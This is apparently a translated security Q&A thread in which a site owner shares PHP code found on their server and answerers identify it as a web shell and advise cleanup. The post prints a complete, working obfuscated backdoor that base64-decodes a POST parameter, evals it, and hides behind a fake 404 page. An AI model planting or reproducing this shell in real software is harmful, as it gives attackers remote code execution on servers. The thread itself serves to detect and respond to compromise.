Código PHP encontrado ¿Es malicioso? [duplicar]

-1

Encontré el siguiente código en mi sitio web. ¿Qué hace? ¿Es malicioso?

<?php
    @ignore_user_abort(true);
    @set_time_limit(0);
    $getherw3423 = "FFS"."W35"."25KK"."Sfj";
    $rretert454352 = "b"."".""."a"."s".""."".""."e"."".""."6"."".""."4"."_".""."".""."d"."e"."c"."o".""."".""."".""."d".""."e";
    $qwretrqt5234 = "";
    if(!empty($_POST[$getherw3423]) and strlen($_POST[$getherw3423]) > 0 and isset($_POST[$getherw3423])){
        $qwretrqt5234 = $rretert454352($_POST[$getherw3423]);
        @eval($qwretrqt5234);
    } else {
        echo "<html><head>
        <title>404 Page Not Found</title>
        </head><body>
        <h1>Not Found</h1>
        <p>The requested URL was not found.</p>
        </body></html>";
    }
?>
    
pregunta Chris 08.05.2015 - 16:17
fuente

3 respuestas

3

Shell PHP modificado. El compromiso es malo; Shell es peor. Lo mejor es tener copias de seguridad, armas nucleares, cambiar contraseñas, volver a cargar.

Trabajo de piernas rápido:

La cadena "FFSW3525KKSfj" obtiene de forma trivial a este resultado , que está claramente inspirado en el mismo código base (que contiene toda la base dividida64 referencia). El pivote fácil desde allí es "¡ERROR! ¡NO PUEDE HACER NADA!".

Eso descubre que está relacionado con éste , con md5 62c8486b3d05c537e5f81efec5050937b , identificado como PHP.Shell.95.

Este sitio informa el script en asociación con el envío de millones de mensajes de spam, Joomla está relacionado asociado con la instalación de un componente llamado mod_administrator, pero el consejo se basa en gran medida en la salida aleatoria, así que no estoy enlazando. Parece estar relacionado con este repositorio de github (Vanilla Ice, acondicionadores). El marco de tiempo es correcto.

    
respondido por el ǝɲǝɲbρɯͽ 08.05.2015 - 18:06
fuente
1

Este código analiza los datos de publicación codificados en base64 y los ejecuta como un script.

Le aconsejo que elimine el sitio afectado de inmediato, ya que los datos almacenados en el sistema de archivos o las bases de datos conectadas están ahora en riesgo. ¡Elimine usuarios de la base de datos y prepárese para limpiar!

Hay muchos ejemplos de lo que debe hacer en caso de que se explote su sitio web. Le sugiero que busque y siga los consejos ofrecidos.

    
respondido por el Aaron Dobbing 08.05.2015 - 16:51
fuente
0

Es un script simple que toma un argumento que se le transmite desde otro script o posiblemente incluso a la URL, y luego lo ejecuta como código php arbitrario.

Por lo tanto, solo es tan malicioso como el extraño desconocido que lo instaló, o quien lo encuentre. ¡Quién sabe! Tal vez le resulte útil la conveniencia de tener su servidor web ejecutando código arbitrario.

    
respondido por el J Kimball 08.05.2015 - 17:01
fuente

Lea otras preguntas en las etiquetas